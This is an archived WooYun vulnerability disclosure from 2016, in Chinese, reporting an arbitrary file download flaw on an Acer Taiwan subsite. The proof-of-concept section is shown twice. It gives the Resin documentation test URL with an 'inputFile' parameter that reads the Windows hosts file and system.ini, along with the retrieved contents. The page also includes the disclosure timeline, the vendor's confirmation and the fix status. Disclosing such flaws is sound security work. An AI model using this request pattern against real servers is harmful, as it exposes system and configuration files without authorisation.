当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0172727

漏洞标题:宏基acer分站任意文件下载漏洞(臺灣地區)

相关厂商:宏基acer

漏洞作者: 路人甲

提交时间:2016-01-26 10:24

修复时间:2016-02-20 17:07

公开时间:2016-02-20 17:07

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-26: 细节已通知厂商并且等待厂商处理中
2016-01-26: 厂商已经确认,细节仅向厂商公开
2016-02-05: 细节向核心白帽子及相关领域专家公开
2016-02-15: 细节向普通白帽子公开
2016-02-20: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

详细说明:

acer.JPG


获得hosts文件:
**.**.**.**/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=C:\Windows\system32\drivers\etc\hosts

inputFile: C:\Windows\system32\drivers\etc\hosts
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      **.**.**.**     **.**.**.**          # source server
#       **.**.**.**     **.**.**.**              # x client host
**.**.**.**       localhost
#**.**.**.**  **.**.**.**
**.**.**.**  **.**.**.**
back to demo


获得system.ini文件:
**.**.**.**/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=C:\Windows\system.ini

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=app950.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON


漏洞证明:

acer.JPG


获得hosts文件:
**.**.**.**/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=C:\Windows\system32\drivers\etc\hosts

inputFile: C:\Windows\system32\drivers\etc\hosts
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      **.**.**.**     **.**.**.**          # source server
#       **.**.**.**     **.**.**.**              # x client host
**.**.**.**       localhost
#**.**.**.**  **.**.**.**
**.**.**.**  **.**.**.**
back to demo


获得system.ini文件:
**.**.**.**/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=C:\Windows\system.ini

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh]
woafont=app950.FON
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON


修复方案:

升级

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2016-01-26 23:18

厂商回复:

感謝通報

最新状态:

2016-02-20:已修復